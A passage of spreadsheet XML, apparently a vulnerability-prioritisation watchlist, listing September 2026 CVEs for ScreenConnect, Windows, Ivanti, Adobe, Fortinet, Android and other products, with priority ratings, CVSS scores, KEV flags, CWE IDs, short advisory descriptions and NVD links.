t="inlineStr"><is><t>SSVC</t></is></c><c r="J1" s="4" t="inlineStr"><is><t>Watchlist</t></is></c><c r="K1" s="4" t="inlineStr"><is><t>Vendor / Product</t></is></c><c r="L1" s="4" t="inlineStr"><is><t>Package</t></is></c><c r="M1" s="4" t="inlineStr"><is><t>Fixed in</t></is></c><c r="N1" s="4" t="inlineStr"><is><t>Sources</t></is></c><c r="O1" s="4" t="inlineStr"><is><t>Published</t></is></c><c r="P1" s="4" t="inlineStr"><is><t>Last Modified</t></is></c><c r="Q1" s="4" t="inlineStr"><is><t>KEV Due</t></is></c><c r="R1" s="4" t="inlineStr"><is><t>CWE</t></is></c><c r="S1" s="4" t="inlineStr"><is><t>Description</t></is></c><c r="T1" s="4" t="inlineStr"><is><t>Link</t></is></c></row><row r="2"><c r="A2" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B2" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2" s="5" t="inlineStr"><is><t>CVE-2026-84869</t></is></c><c r="D2" s="5" t="n"><v>9.9</v></c><c r="E2" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2" s="5" t="inlineStr"><is><t>7d616e1a-3288-43b1-a0dd-0a65d3e70a49</t></is></c><c r="G2" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H2" s="5" t="n"><v>0.007</v></c><c r="I2" s="5" t="inlineStr" /><c r="J2" s="5" t="inlineStr" /><c r="K2" s="5" t="inlineStr"><is><t>connectwise:screenconnect</t></is></c><c r="L2" s="5" t="inlineStr" /><c r="M2" s="5" t="inlineStr" /><c r="N2" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O2" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q2" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="R2" s="5" t="inlineStr"><is><t>CWE-269, CWE-862</t></is></c><c r="S2" s="5" t="inlineStr"><is><t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t></is></c><c r="T2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t></is></c></row><row r="3"><c r="A3" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B3" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C3" s="5" t="inlineStr"><is><t>CVE-2026-81963</t></is></c><c r="D3" s="5" t="n"><v>7.8</v></c><c r="E3" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F3" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G3" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H3" s="5" t="n"><v>0.006</v></c><c r="I3" s="5" t="inlineStr" /><c r="J3" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L3" s="5" t="inlineStr" /><c r="M3" s="5" t="inlineStr" /><c r="N3" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O3" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P3" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q3" s="5" t="inlineStr"><is><t>2026-09-22</t></is></c><c r="R3" s="5" t="inlineStr"><is><t>CWE-284, CWE-59</t></is></c><c r="S3" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t></is></c></row><row r="4"><c r="A4" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B4" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C4" s="5" t="inlineStr"><is><t>CVE-2026-85880</t></is></c><c r="D4" s="5" t="n"><v>7.8</v></c><c r="E4" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F4" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G4" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H4" s="5" t="n"><v>0.006</v></c><c r="I4" s="5" t="inlineStr" /><c r="J4" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t></is></c><c r="L4" s="5" t="inlineStr" /><c r="M4" s="5" t="inlineStr" /><c r="N4" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O4" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P4" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q4" s="5" t="inlineStr"><is><t>2026-09-22</t></is></c><c r="R4" s="5" t="inlineStr"><is><t>CWE-122, CWE-908</t></is></c><c r="S4" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t></is></c></row><row r="5"><c r="A5" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B5" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C5" s="5" t="inlineStr"><is><t>CVE-2026-60004</t></is></c><c r="D5" s="5" t="inlineStr" /><c r="E5" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G5" s="5" t="inlineStr" /><c r="H5" s="5" t="n"><v>0.868</v></c><c r="I5" s="5" t="inlineStr" /><c r="J5" s="5" t="inlineStr" /><c r="K5" s="5" t="inlineStr" /><c r="L5" s="5" t="inlineStr"><is><t>Go:gitea.dev</t></is></c><c r="M5" s="5" t="inlineStr"><is><t>1.27.1</t></is></c><c r="N5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O5" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P5" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q5" s="5" t="inlineStr" /><c r="R5" s="5" t="inlineStr" /><c r="S5" s="5" t="inlineStr"><is><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is></c><c r="T5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-60004</t></is></c></row><row r="6"><c r="A6" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B6" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C6" s="5" t="inlineStr"><is><t>CVE-2026-44756</t></is></c><c r="D6" s="5" t="n"><v>10</v></c><c r="E6" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F6" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G6" s="5" t="inlineStr" /><c r="H6" s="5" t="n"><v>0.003</v></c><c r="I6" s="5" t="inlineStr" /><c r="J6" s="5" t="inlineStr" /><c r="K6" s="5" t="inlineStr" /><c r="L6" s="5" t="inlineStr" /><c r="M6" s="5" t="inlineStr" /><c r="N6" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q6" s="5" t="inlineStr" /><c r="R6" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S6" s="5" t="inlineStr"><is><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is></c><c r="T6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-44756</t></is></c></row><row r="7"><c r="A7" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B7" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C7" s="5" t="inlineStr"><is><t>CVE-2026-82004</t></is></c><c r="D7" s="5" t="n"><v>10</v></c><c r="E7" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F7" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G7" s="5" t="inlineStr" /><c r="H7" s="5" t="n"><v>0.014</v></c><c r="I7" s="5" t="inlineStr" /><c r="J7" s="5" t="inlineStr" /><c r="K7" s="5" t="inlineStr"><is><t>adobe:campaign</t></is></c><c r="L7" s="5" t="inlineStr" /><c r="M7" s="5" t="inlineStr" /><c r="N7" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O7" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P7" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q7" s="5" t="inlineStr" /><c r="R7" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S7" s="5" t="inlineStr"><is><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is></c><c r="T7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t></is></c></row><row r="8"><c r="A8" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B8" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C8" s="5" t="inlineStr"><is><t>CVE-2026-12645</t></is></c><c r="D8" s="5" t="n"><v>9.9</v></c><c r="E8" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F8" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G8" s="5" t="inlineStr" /><c r="H8" s="5" t="n"><v>0.012</v></c><c r="I8" s="5" t="inlineStr" /><c r="J8" s="5" t="inlineStr" /><c r="K8" s="5" t="inlineStr" /><c r="L8" s="5" t="inlineStr" /><c r="M8" s="5" t="inlineStr" /><c r="N8" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O8" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P8" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q8" s="5" t="inlineStr" /><c r="R8" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S8" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12645</t></is></c></row><row r="9"><c r="A9" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B9" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C9" s="5" t="inlineStr"><is><t>CVE-2026-12646</t></is></c><c r="D9" s="5" t="n"><v>9.9</v></c><c r="E9" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F9" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G9" s="5" t="inlineStr" /><c r="H9" s="5" t="n"><v>0.012</v></c><c r="I9" s="5" t="inlineStr" /><c r="J9" s="5" t="inlineStr" /><c r="K9" s="5" t="inlineStr" /><c r="L9" s="5" t="inlineStr" /><c r="M9" s="5" t="inlineStr" /><c r="N9" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O9" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P9" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q9" s="5" t="inlineStr" /><c r="R9" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S9" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12646</t></is></c></row><row r="10"><c r="A10" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B10" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C10" s="5" t="inlineStr"><is><t>CVE-2026-12647</t></is></c><c r="D10" s="5" t="n"><v>9.9</v></c><c r="E10" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F10" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G10" s="5" t="inlineStr" /><c r="H10" s="5" t="n"><v>0.012</v></c><c r="I10" s="5" t="inlineStr" /><c r="J10" s="5" t="inlineStr" /><c r="K10" s="5" t="inlineStr" /><c r="L10" s="5" t="inlineStr" /><c r="M10" s="5" t="inlineStr" /><c r="N10" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O10" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P10" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q10" s="5" t="inlineStr" /><c r="R10" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S10" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T10" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12647</t></is></c></row><row r="11"><c r="A11" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B11" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C11" s="5" t="inlineStr"><is><t>CVE-2026-12650</t></is></c><c r="D11" s="5" t="n"><v>9.9</v></c><c r="E11" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F11" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G11" s="5" t="inlineStr" /><c r="H11" s="5" t="n"><v>0.015</v></c><c r="I11" s="5" t="inlineStr" /><c r="J11" s="5" t="inlineStr" /><c r="K11" s="5" t="inlineStr" /><c r="L11" s="5" t="inlineStr" /><c r="M11" s="5" t="inlineStr" /><c r="N11" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O11" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P11" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q11" s="5" t="inlineStr" /><c r="R11" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S11" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T11" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12650</t></is></c></row><row r="12"><c r="A12" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B12" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C12" s="5" t="inlineStr"><is><t>CVE-2026-19232</t></is></c><c r="D12" s="5" t="n"><v>9.9</v></c><c r="E12" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F12" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G12" s="5" t="inlineStr" /><c r="H12" s="5" t="n"><v>0.006</v></c><c r="I12" s="5" t="inlineStr" /><c r="J12" s="5" t="inlineStr" /><c r="K12" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L12" s="5" t="inlineStr" /><c r="M12" s="5" t="inlineStr" /><c r="N12" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O12" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P12" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q12" s="5" t="inlineStr" /><c r="R12" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S12" s="5" t="inlineStr"><is><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is></c><c r="T12" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t></is></c></row><row r="13"><c r="A13" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B13" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C13" s="5" t="inlineStr"><is><t>CVE-2026-26084</t></is></c><c r="D13" s="5" t="n"><v>9.9</v></c><c r="E13" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F13" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G13" s="5" t="inlineStr" /><c r="H13" s="5" t="n"><v>0.002</v></c><c r="I13" s="5" t="inlineStr" /><c r="J13" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K13" s="5" t="inlineStr" /><c r="L13" s="5" t="inlineStr" /><c r="M13" s="5" t="inlineStr" /><c r="N13" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q13" s="5" t="inlineStr" /><c r="R13" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S13" s="5" t="inlineStr"><is><t>A improper access control vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow attacker to access sensitive information via crafted HTTP requests.</t></is></c><c r="T13" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t></is></c></row><row r="14"><c r="A14" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B14" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C14" s="5" t="inlineStr"><is><t>CVE-2026-48273</t></is></c><c r="D14" s="5" t="n"><v>9.9</v></c><c r="E14" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F14" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G14" s="5" t="inlineStr" /><c r="H14" s="5" t="n"><v>0.019</v></c><c r="I14" s="5" t="inlineStr" /><c r="J14" s="5" t="inlineStr" /><c r="K14" s="5" t="inlineStr"><is><t>adobe:coldfusion</t></is></c><c r="L14" s="5" t="inlineStr" /><c r="M14" s="5" t="inlineStr" /><c r="N14" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O14" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P14" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q14" s="5" t="inlineStr" /><c r="R14" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S14" s="5" t="inlineStr"><is><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is></c><c r="T14" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48273</t></is></c></row><row r="15"><c r="A15" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B15" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C15" s="5" t="inlineStr"><is><t>CVE-2026-78234</t></is></c><c r="D15" s="5" t="n"><v>9.9</v></c><c r="E15" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F15" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G15" s="5" t="inlineStr" /><c r="H15" s="5" t="n"><v>0.002</v></c><c r="I15" s="5" t="inlineStr" /><c r="J15" s="5" t="inlineStr" /><c r="K15" s="5" t="inlineStr" /><c r="L15" s="5" t="inlineStr" /><c r="M15" s="5" t="inlineStr" /><c r="N15" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q15" s="5" t="inlineStr" /><c r="R15" s="5" t="inlineStr"><is><t>CWE-295</t></is></c><c r="S15" s="5" t="inlineStr"><is><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is></c><c r="T15" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78234</t></is></c></row><row r="16"><c r="A16" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B16" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C16" s="5" t="inlineStr"><is><t>CVE-2026-86464</t></is></c><c r="D16" s="5" t="n"><v>9.9</v></c><c r="E16" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F16" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G16" s="5" t="inlineStr" /><c r="H16" s="5" t="n"><v>0.004</v></c><c r="I16" s="5" t="inlineStr" /><c r="J16" s="5" t="inlineStr"><is><t>kubernetes, docker, postgresql, keycloak</t></is></c><c r="K16" s="5" t="inlineStr" /><c r="L16" s="5" t="inlineStr" /><c r="M16" s="5" t="inlineStr" /><c r="N16" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O16" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P16" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q16" s="5" t="inlineStr" /><c r="R16" s="5" t="inlineStr"><is><t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t></is></c><c r="S16" s="5" t="inlineStr"><is><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is></c><c r="T16" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t></is></c></row><row r="17"><c r="A17" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B17" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C17" s="5" t="inlineStr"><is><t>CVE-2026-12744</t></is></c><c r="D17" s="5" t="n"><v>9.800000000000001</v></c><c r="E17" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F17" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G17" s="5" t="inlineStr" /><c r="H17" s="5" t="n"><v>0.022</v></c><c r="I17" s="5" t="inlineStr" /><c r="J17" s="5" t="inlineStr" /><c r="K17" s="5" t="inlineStr" /><c r="L17" s="5" t="inlineStr" /><c r="M17" s="5" t="inlineStr" /><c r="N17" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O17" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P17" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q17" s="5" t="inlineStr" /><c r="R17" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S17" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T17" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12744</t></is></c></row><row r="18"><c r="A18" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B18" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C18" s="5" t="inlineStr"><is><t>CVE-2026-12745</t></is></c><c r="D18" s="5" t="n"><v>9.800000000000001</v></c><c r="E18" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F18" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G18" s="5" t="inlineStr" /><c r="H18" s="5" t="n"><v>0.021</v></c><c r="I18" s="5" t="inlineStr" /><c r="J18" s="5" t="inlineStr" /><c r="K18" s="5" t="inlineStr" /><c r="L18" s="5" t="inlineStr" /><c r="M18" s="5" t="inlineStr" /><c r="N18" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O18" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P18" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q18" s="5" t="inlineStr" /><c r="R18" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S18" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T18" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12745</t></is></c></row><row r="19"><c r="A19" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B19" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C19" s="5" t="inlineStr"><is><t>CVE-2026-28606</t></is></c><c r="D19" s="5" t="n"><v>9.800000000000001</v></c><c r="E19" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F19" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G19" s="5" t="inlineStr" /><c r="H19" s="5" t="n"><v>0.003</v></c><c r="I19" s="5" t="inlineStr" /><c r="J19" s="5" t="inlineStr" /><c r="K19" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L19" s="5" t="inlineStr" /><c r="M19" s="5" t="inlineStr" /><c r="N19" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O19" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P19" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q19" s="5" t="inlineStr" /><c r="R19" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S19" s="5" t="inlineStr"><is><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is></c><c r="T19" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28606</t></is></c></row><row r="20"><c r="A20" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B20" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C20" s="5" t="inlineStr"><is><t>CVE-2026-49921</t></is></c><c r="D20" s="5" t="n"><v>9.800000000000001</v></c><c r="E20" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F20" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G20" s="5" t="inlineStr" /><c r="H20" s="5" t="n"><v>0.003</v></c><c r="I20" s="5" t="inlineStr" /><c r="J20" s="5" t="inlineStr" /><c r="K20" s="5" t="inlineStr" /><c r="L20" s="5" t="inlineStr" /><c r="M20" s="5" t="inlineStr" /><c r="N20" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O20" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P20" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q20" s="5" t="inlineStr" /><c r="R20" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S20" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49921</t></is></c></row><row r="21"><c r="A21" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B21" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C21" s="5" t="inlineStr"><is><t>CVE-2026-58240</t></is></c><c r="D21" s="5" t="n"><v>9.800000000000001</v></c><c r="E21" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F21" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G21" s="5" t="inlineStr" /><c r="H21" s="5" t="n"><v>0.003</v></c><c r="I21" s="5" t="inlineStr" /><c r="J21" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K21" s="5" t="inlineStr" /><c r="L21" s="5" t="inlineStr" /><c r="M21" s="5" t="inlineStr" /><c r="N21" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O21" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P21" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q21" s="5" t="inlineStr" /><c r="R21" s="5" t="inlineStr"><is><t>CWE-308</t></is></c><c r="S21" s="5" t="inlineStr"><is><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is></c><c r="T21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t></is></c></row><row r="22"><c r="A22" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B22" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C22" s="5" t="inlineStr"><is><t>CVE-2026-58822</t></is></c><c r="D22" s="5" t="n"><v>9.800000000000001</v></c><c r="E22" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F22" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G22" s="5" t="inlineStr" /><c r="H22" s="5" t="n"><v>0.003</v></c><c r="I22" s="5" t="inlineStr" /><c r="J22" s="5" t="inlineStr" /><c r="K22" s="5" t="inlineStr" /><c r="L22" s="5" t="inlineStr" /><c r="M22" s="5" t="inlineStr" /><c r="N22" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O22" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P22" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q22" s="5" t="inlineStr" /><c r="R22" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S22" s="5" t="inlineStr"><is><t>In multiple functions of ftsmooth.c, there is a possible memory safety issue due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58822</t></is></c></row><row r="23"><c r="A23" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B23" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C23" s="5" t="inlineStr"><is><t>CVE-2026-61516</t></is></c><c r="D23" s="5" t="n"><v>9.800000000000001</v></c><c r="E23" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F23" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G23" s="5" t="inlineStr" /><c r="H23" s="5" t="n"><v>0.004</v></c><c r="I23" s="5" t="inlineStr" /><c r="J23" s="5" t="inlineStr" /><c r="K23" s="5" t="inlineStr" /><c r="L23" s="5" t="inlineStr" /><c r="M23" s="5" t="inlineStr" /><c r="N23" 